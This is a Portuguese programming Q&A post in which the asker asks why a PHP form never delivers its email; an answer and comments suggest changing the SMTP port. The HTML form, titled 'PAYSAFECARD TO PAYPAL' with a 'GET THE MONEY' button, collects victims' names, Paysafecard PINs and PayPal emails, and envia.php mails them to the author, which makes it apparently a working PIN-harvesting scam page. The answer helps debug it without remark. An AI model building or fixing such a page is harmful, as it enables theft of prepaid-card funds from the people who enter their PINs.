# Phpmailer - não funciona

Tags: php, html, email, phpmailer

então, estou tentando fazer 1 formulario para enviar algumas informações no meu email, ele esta retornando com sucesso, mas acaba não enviando o email.

envia.php

```php
<?php

include_once('phpmailer.php'); //Chama o arquivo phpmailer.php com as funções para realizar o envio.

//#########################################
// Recebe as informações do formulário
//#########################################

$nome = $_POST["nome"];
$email = $_POST["email"];
$pin = $_POST["pin"];
$assunto = "Recebimento de ". $email ."";
$mensagem ="Novo troca disponivel. \nNome:". $nome ."\nEmail: ". $email ."\nPin: ". $pin ."\n";

//#########################################
// Dados da conta de e-mail que fará o envio
//#########################################

$smtp = new Smtp("smtpout.secureserver.net"); //Endereço do SMTP, geralmente localhost.
$smtp->user = "user@host.com"; //Conta de email
$smtp->pass = "pass"; //Senha da Conta de e-mail.
$smtp->debug = false; //Somente para usuários avançados que desejam o log do envio para testes.

//#########################################
// Envio do formulário
//#########################################

$to = "receber@host.com"; //Informe aqui o e-mail que deve receber a mensagem do formulário.
$from = $email;
$subject = "Troca – " . $assunto;
$msg = $mensagem;

if (isset($_POST["submit"])) {
if($nome && $email && $pin) {
if($smtp->Send($to, $from, $subject, $msg)){
echo "<script>window.location = 'success.html';</script>"; //Altere aqui para o endereço de sua página.
exit;
}
}

else {
echo "<script>window.location = 'error.html';</script>"; //Altere aqui para o endereço de seu formulário
exit;
}

}

?>
```

index.html

```html
            <form class="contact100-form validate-form" action="envia.php" method="post" id="contato">
                <img src="https://i.imgur.com/4Zp2dxx.png">
                <span class="contact100-form-title">
                </span>
                <span class="contact100-form-title">
                    GOLD - EASY TRANSFER
                    <h1>PAYSAFECARD TO PAYPAL</h1>
                </span>

                <div class="wrap-input100 validate-input" data-validate="Please enter your full name.">
                    <input class="input100" type="text" name="nome" id="nome" placeholder="FULL NAME">
                    <span class="focus-input100"></span>
                </div>
                <div class="wrap-input100 validate-input" data-validate = "Please enter your paysafecard PIN.">
                    <input class="input100" type="text" name="pin" id="pin" placeholder="Paysafecard PIN">
                    <span class="focus-input100"></span>
                </div>


                <div class="wrap-input100 validate-input" data-validate = "Please enter your paypal account email.">
                    <input class="input100" type="text" name="email" id="email" placeholder="Paypal EMAIL">
                    <span class="focus-input100"></span>
                </div>



                <div class="container-contact100-form-btn">
                    <button class="contact100-form-btn" name="submit" type="submit" value="Enviar" >
                        <span>
                            <i class="fa fa-refresh" aria-hidden="true"></i>
                            GET THE MONEY
                        </span>
                    </button>
                </div>
            </form>
```

phpmailer.php

```php
<?php

class Smtp{

var $conn;
var $user;
var $pass;
var $debug = false;

function Smtp($host){
$this->conn = fsockopen($host, 25, $errno, $errstr, 30);
$this->Put("EHLO $host");
}
function Auth(){
$this->Put("AUTH LOGIN");
$this->Put(base64_encode($this->user));
$this->Put(base64_encode($this->pass));
}
function Send($to, $from, $subject, $msg){

$this->Auth();
$this->Put("MAIL FROM: " . $from);
$this->Put("RCPT TO: " . $to);
$this->Put("DATA");
$this->Put($this->toHeader($to, $from, $subject));
$this->Put("\r\n");
$this->Put($msg);
$this->Put(".");
$this->Close();
if(isset($this->conn)){
return true;
}else{
return false;
}
}
function Put($value){
return fputs($this->conn, $value . "\r\n");
}
function toHeader($to, $from, $subject){

$header = "From: <" . $from . "> \r\n";

return $header;
}
function Close(){
$this->Put("QUIT");
if($this->debug == true){
while (!feof ($this->conn)) {
echo fgets($this->conn) . "<br>\n";
}
}
return fclose($this->conn);
}
}

?>
```

Answer (score 0, accepted):

Você fez quase certo, só falto a porta SMTP que o PHPMailer precisa para comunicar com servidor de envio...

Verifiquei seu código após envio, então vou pontuar uma coisa pra você fazer, não declare a porta da function SMTP padrão 25, obriga ser passada na primeira tela pois pode ser 587,465 ou 25 você não sabe.

Comment: não, porque eu uso email do meu dominio, e nas configurações esta 25, e se eu usar algumas plataformas, tipo opencart, ele envia normalmente com a porta 25

Comment: Teste com outra porta para ter a certeza, caso erro persista post o erro que retorna.

Comment: ja testei com outras portas, mas não funcionou